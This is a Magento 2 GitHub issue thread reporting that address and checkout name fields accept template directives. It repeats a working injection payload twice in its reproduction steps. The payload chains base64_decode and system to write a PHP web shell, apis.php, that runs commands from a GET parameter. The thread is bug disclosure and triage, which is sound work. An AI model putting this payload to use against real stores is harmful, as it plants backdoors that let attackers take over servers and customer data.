### ISSUE TITLE
Customer address form allows random code in the name fields

### ISSUE THREAD

**Issue by nkarthickannan** [magento/magento2#38331]
### Preconditions and environment

Magento version - 2.4.6-p3

### Steps to reproduce

1. Install a fresh Magento latest version with sample data
2. Register as a customer and login
3. Add a new address from the My Account section
4. Provide the following code in the First name and Last name fields

{{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}

### Expected result

Magento should not allow to proceed by throwing an error

### Actual result

Magento allows the user to proceed further without throwing an error

### Additional information

The same issue is NOT reproducible in the registration page. However, it occurs in the My Account -> Add new address page and in the checkout shipping and billing address pages.

![Screenshot 2024-01-04 at 2 14 31 PM](https://github.com/magento/magento2/assets/9784301/3a2f5f48-572e-47b2-98cc-3b0005678b73)
![Screenshot 2024-01-04 at 2 17 05 PM](https://github.com/magento/magento2/assets/9784301/760eddfc-1e85-4b24-afb8-199bf7e59aba)

### Triage and priority

- [X] Severity: **S0** _- Affects critical data or functionality and leaves users without workaround._
- [ ] Severity: **S1** _- Affects critical data or functionality and forces users to employ a workaround._
- [ ] Severity: **S2** _- Affects non-critical data or functionality and forces users to employ a workaround._
- [ ] Severity: **S3** _- Affects non-critical data or functionality and does not force users to employ a workaround._
- [ ] Severity: **S4** _- Affects aesthetics, professional look and feel, “quality” or “usability”._

**Comment by nkarthickannan** [comment]
Issue confirmed in the Magento instance provided by the bot as well. The screenshots are provided below for reference:
![Screenshot 2024-01-04 at 2 50 01 PM](https://github.com/magento/magento2/assets/9784301/b9e35f08-5d0d-4150-b1af-e5e798a580ff)
![Screenshot 2024-01-04 at 2 52 31 PM](https://github.com/magento/magento2/assets/9784301/85ddd764-0eed-483f-ba2d-c23a50037322)
![Screenshot 2024-01-04 at 2 51 50 PM](https://github.com/magento/magento2/assets/9784301/79b579fe-5ad9-4544-8d3f-26abb3d07310)
![Screenshot 2024-01-04 at 2 54 13 PM](https://github.com/magento/magento2/assets/9784301/4f85134f-9482-488c-bc66-a9fe1b34360d)
![Screenshot 2024-01-04 at 2 48 49 PM](https://github.com/magento/magento2/assets/9784301/60e1138c-8ef1-4a67-a78e-0286805d2694)

**Comment by engcom-Bravo** [comment]
HI @nkarthickannan,

Thank you for reporting and collaboration.

Verified the issue on Magento 2.4-develop instance and the issue is reproducible.Kindly refer the screenshots.


**Steps to reproduce**

- Install a fresh Magento latest version with sample data
- Register as a customer and login
- Add a new address from the My Account section
- Provide the following code in the First name and Last name fields


{{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}


While Creating New customer it is working fine and throws an error for first name and last name.

![Screenshot from 2024-01-05 15-10-48](https://github.com/magento/magento2/assets/51680745/c00f4666-252f-4d30-b7df-b5ae4b8f616d)


For an address it is not giving any error for first name and last name and it is saved successfully.

![Screenshot from 2024-01-05 15-07-23](https://github.com/magento/magento2/assets/51680745/c996e2b2-f729-4ba7-b72f-c129c92b8f0b)


Hence Confirming the issue.

Thanks.

**Comment by karthickannan-247commerce** [comment]
@engcom-Bravo Considering the severity of this issue, will it be possible to provide a patch release for this bug ? As it is already working in the registration form, implementation will not take much time. Also, this may lead to security problems as well.

So, it will be better if it is addressed on top priority.

**Comment by nkarthickannan** [comment]
@engcom-Bravo 

Considering the severity of this issue, will it be possible to provide a patch release for this bug ? As it is already working in the registration form, implementation will not take much time (I may be wrong). Also, this may lead to security problems as well.

So, it will be better if it is addressed on top priority.

**Comment by dekiakbar** [comment]
@magento I'm working on this

**Comment by gitevildelta** [comment]
@magento give me 2.4-develop instance

**Comment by gitevildelta** [comment]
@magento give me 2.4.6-p3 instance

**Comment by gitevildelta** [comment]
@magento give me 2.4.6-p2 instance

**Comment by gitevildelta** [comment]
@magento give me 2.4.6-p3 instance

**Comment by themew** [comment]
We are seeing this on 2.4.6-p6 as of today.  Can we re-open this issue @engcom-Bravo   Orders are being placed using this with Paypal as payment.

**Comment by bafmaamy** [comment]
Try this https://github.com/magento/magento2/issues/39002#issuecomment-2291143582

**Comment by ihor-sviziev** [comment]
Wasn't it fixed in https://github.com/magento/magento2/pull/38345?
